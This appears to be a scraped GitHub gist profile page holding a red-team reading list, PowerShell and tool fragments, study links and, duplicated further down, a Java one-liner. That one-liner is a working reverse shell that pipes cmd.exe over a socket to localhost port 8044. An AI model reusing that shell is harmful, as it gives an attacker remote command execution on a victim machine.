Computer button pusher // Pousseur de boutons en informatique || SIN - SIN HACK - HACK || NO-CODE evangelist || Black coffee like my sense of humor Saltinbank-SyS

## gist:169ffd7d85522e8d01f2b1c80c55a787
From: http://redteams.net/bookshelf/
Techie

    Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
    Social Engineering: The Art of Human Hacking by Christopher Hadnagy
    Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
    The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
    Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
    Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
    The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors

## gist:80f7b0e3e27666560f9f718cdec02285
8YOU COULD PRETEND YOU LIKE SMASH
YOU COULD RELEASE BOOZE
YOU COULD PLAY SHADERS
YOU COULD SHIP VIOLENCE
YOU COULD ANNOY HAUJOBB
YOU COULD SMASH MUSIC
YOU COULD ADORE THE DEADLINE
YOU COULD CELEBRATE SMASH
YOU COULD DROP HAUJOBB
YOU COULD SELL SHADERS

## powershell
Get-AppxPackage | % { Add-AppxPackage -DisableDevelopmentMode -Register "$($_.InstallLocation)\AppxManifest.xml" -verbose }

#It is supposed to get/add any package missing.
#Also, make sure your "Services" are turned on for all required services, most importantly
#Client License Service (ClipSVC

## .html
https://adsecurity.org/?page_id=1821

## trawler.ps1
<#
	.SYNOPSIS
		trawler helps Incident Responders discover suspicious persistence mechanisms on Windows devices.

	.DESCRIPTION
		trawler inspects a wide variety of Windows artifacts to help discover signals of persistence including the registry, scheduled tasks, services, startup items, etc.
        For a full list of artifacts, please see github.com/joeavanzato/trawler

	.PARAMETER outpath
		The fully-qualified file-path where detection output should be stored as a CSV

## gist:99012f3a1ed44c4a15eff1a2b6b642f9
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

## gist:d0fdf8b39d13bdd70309e6af1eabe7db

Free Study Guide
• https://lnkd.in/ebcJM2yX

CompTIA Security+
• https://lnkd.in/en76AA_f

CompTIA CASP+
• https://lnkd.in/eUMURB3s

## SharePwn_public.py
# -*- coding: utf-8 -*-
import hashlib
import base64
import requests, string, struct, uuid, random, re
import sys
from collections import OrderedDict
from sys import version
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# too lazy to deal with string <-> bytes confusion in python3 so forget it ¯\_(ツ)_/¯

## 1-way-ssl.jpg

      
              3 files
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                Saltinbank-SyS
                / 1-way-ssl.jpg
            
            
              Created
              November 7, 2023 04:48
                — forked from mohanpedala/1-way-ssl.jpg
            
              
                One-Way SSL and Two-Way SSL
              
          
## gist:c5d13ff64debb67bab5552b0106d8c10

👉𝗪𝗛𝗔𝗧 𝗜𝗦 𝗥𝗘𝗗 𝗧𝗘𝗔𝗠?
🌟Red Team definition, redteam guide by Joe Vest & James Tubberville
https://lnkd.in/eUaZcWvg

🌟Red Teaming Handbook, UK Ministry of Defense
https://lnkd.in/euUkwQRq

👉𝗪𝗛𝗔𝗧 𝗔𝗥𝗘 𝗥𝗘𝗗 𝗧𝗘𝗔𝗠 𝗘𝗫𝗘𝗥𝗖𝗜𝗦𝗘𝗦?
🌟NIST’s Definition of Red Team Exercise
	From: http://redteams.net/bookshelf/
	Techie

	Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
	Social Engineering: The Art of Human Hacking by Christopher Hadnagy
	Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
	The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
	Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
	Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
	The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors
	8YOU COULD PRETEND YOU LIKE SMASH
	YOU COULD RELEASE BOOZE
	YOU COULD PLAY SHADERS
	YOU COULD SHIP VIOLENCE
	YOU COULD ANNOY HAUJOBB
	YOU COULD SMASH MUSIC
	YOU COULD ADORE THE DEADLINE
	YOU COULD CELEBRATE SMASH
	YOU COULD DROP HAUJOBB
	YOU COULD SELL SHADERS
	Get-AppxPackage \| % { Add-AppxPackage -DisableDevelopmentMode -Register "$($_.InstallLocation)\AppxManifest.xml" -verbose }

	#It is supposed to get/add any package missing.
	#Also, make sure your "Services" are turned on for all required services, most importantly
	#Client License Service (ClipSVC
	<#
	.SYNOPSIS
	trawler helps Incident Responders discover suspicious persistence mechanisms on Windows devices.

	.DESCRIPTION
	trawler inspects a wide variety of Windows artifacts to help discover signals of persistence including the registry, scheduled tasks, services, startup items, etc.
	For a full list of artifacts, please see github.com/joeavanzato/trawler

	.PARAMETER outpath
	The fully-qualified file-path where detection output should be stored as a CSV
	String host="localhost";
	int port=8044;
	String cmd="cmd.exe";
	Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

	Free Study Guide
	• https://lnkd.in/ebcJM2yX

	CompTIA Security+
	• https://lnkd.in/en76AA_f

	CompTIA CASP+
	• https://lnkd.in/eUMURB3s
	# -- coding: utf-8 --
	import hashlib
	import base64
	import requests, string, struct, uuid, random, re
	import sys
	from collections import OrderedDict
	from sys import version
	from urllib3.exceptions import InsecureRequestWarning
	requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
	# too lazy to deal with string <-> bytes confusion in python3 so forget it ¯\_(ツ)_/¯

	👉𝗪𝗛𝗔𝗧 𝗜𝗦 𝗥𝗘𝗗 𝗧𝗘𝗔𝗠?
	🌟Red Team definition, redteam guide by Joe Vest & James Tubberville
	https://lnkd.in/eUaZcWvg

	🌟Red Teaming Handbook, UK Ministry of Defense
	https://lnkd.in/euUkwQRq

	👉𝗪𝗛𝗔𝗧 𝗔𝗥𝗘 𝗥𝗘𝗗 𝗧𝗘𝗔𝗠 𝗘𝗫𝗘𝗥𝗖𝗜𝗦𝗘𝗦?
	🌟NIST’s Definition of Red Team Exercise